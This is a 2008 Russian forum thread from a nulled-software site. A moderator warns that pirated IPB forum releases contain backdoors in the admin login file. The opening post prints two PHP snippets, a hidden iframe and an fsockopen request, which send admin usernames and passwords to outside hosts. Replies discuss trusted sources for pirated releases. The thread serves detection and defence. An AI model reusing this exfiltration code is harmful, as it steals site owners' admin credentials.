1. Важное и срочное обновление IPB 3.4.5 - https://nulled.cc/threads/243375/

Владельцы нуллов, будьте бдительны!

Тема в разделе "IPB", создана пользователем Maybe, 9 авг 2008.

Статус темы:
Закрыта.
Модераторы: Maybe
  1. Maybe

    Maybe

    Moderator
    Регистр.:
    7 июл 2008
    Сообщения:
    1.160
    Симпатии:
    1.199
    В последнее время массово взламывались форума линейки IPB разных версий (начиная от 2.2.2), но именно НУЛЛОВ.

    Как всегда, мозг человеческий стал думать, как же попадает код от админки третьим лицам. Ведь именно так, взломов по сути не было, входили по коду в админку..

    И нашли как и почему.:

    1) Смотрим этот файл: /sources/action_admin/login.php

    ищем:
    Код:
    $connector
    Если нашли, то имеет такой вид(примерно такой:(

    Код:
    $connector = '&lt;script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
       $this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad 
    (....)
    2) Так же может быть другая версия происходящего.
    Опять же в этом файле: /sources/action_admin/login.php

    Вот код который находили в релизах от DGT:

    Код:
    //-----------------------------------------
    // Lets add some data in here for the access logs...
    //-----------------------------------------
    
    $extra_query .= "&member_id=".$mem['id'].'&password=ok';
    
    //-----------------------------------------
    // Redirect...
    //-----------------------------------------
    
    $fp = @fsockopen('siamogentebuona.altervista.org', 80);
    @fputs($fp, "GET /connector.php?site=".urlencode($this->ipsclass->vars['board_url'])."&username=".urlencode($this->ipsclass->input['username'])."&password=".urlencode($this->ipsclass->input['password'])." HTTP/1.1\r\nHost: siamogentebuona.altervista.org\r\n\r\n");
    $out = '';
    while (!feof($fp)) {
    $out .= @fgets ($fp,128);
    }
    @fclose($fp);
    
    $this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?adsess=".$this->ipsclass->input['adsess']."&".$extra_query, 'Log In Successful' );
    
    exit();
    }
    }
    В итоге пароль попадает в руки, в которых он быть не должен.

    Соблюдайте бдительность, ребята!

    Всего хорошего.
     
    vanoveselov, coden, xzneed и 17 другим нравится это.
  2. Pokemon

    Pokemon Создатель

    Регистр.:
    4 апр 2006
    Сообщения:
    46
    Симпатии:
    21
    Это проверянная информация? Оо
     
  3. davidoff

    davidoff Invision Power

    Регистр.:
    12 янв 2007
    Сообщения:
    204
    Симпатии:
    804
    Ну да,некоторые нуллеры пихают в код бекдоры,давно известная инфа
     
    spydnet, we_are_hakers и newbigmir нравится это.
  4. disker

    disker

    Регистр.:
    28 авг 2007
    Сообщения:
    577
    Симпатии:
    59
    Вывод: нуллы брать только на nulled.ws :D.
     
    spydnet, antonkazan и newbigmir нравится это.
  5. Yozik

    Yozik

    Регистр.:
    5 дек 2007
    Сообщения:
    238
    Симпатии:
    65
    Может стОит составить список нечистоплотных нуллеров? Про DGT учёл, спасибо, буду внимательнее.
     
  6. antonkazan

    antonkazan Писатель

    Регистр.:
    7 июл 2008
    Сообщения:
    7
    Симпатии:
    1
    Спасибо, учёл
     
  7. Maybe

    Maybe

    Moderator
    Регистр.:
    7 июл 2008
    Сообщения:
    1.160
    Симпатии:
    1.199
    Смысла нету. Так как нуллер может быть и нормальный, например та же команда DGT, а кто-то сам уже впаял туда код и пустил на форумах в паблик, или тем же Хрумером прогнал.
    Представьте какая база у него соберется, особенно если релиз актуален..
     
    newbigmir нравится это.
  8. Hesh

    Hesh

    Регистр.:
    7 июн 2008
    Сообщения:
    301
    Симпатии:
    45
    Нужно качать нуллы непосредственно у их изготовителей. Как, например, нулл Давидова на этом форуме.
     
    newbigmir нравится это.
  9. Mosquito

    Mosquito

    Регистр.:
    2 фев 2007
    Сообщения:
    184
    Симпатии:
    12
    Вопрос философский. Небыло бы нулов того же ИПБ, не был бы он так популярен))
     
  10. newbigmir

    newbigmir

    Регистр.:
    31 июл 2007
    Сообщения:
    283
    Симпатии:
    23
    1. Тема актуальна, отблагодарил. Я бы прикрепил тему в разделе.
    2. Качать нулы только от производителей и только с nulled.ws(Как в случае с DLE от Madman или IPB от Davidoff), а не на файлопомойках на которых могут от имени Davidoff или Madman выкладывать всё что угодно...
    3. Если проект приносит прибыль ставьте лицензионку, но она сцуко дорогая.
     
Статус темы:
Закрыта.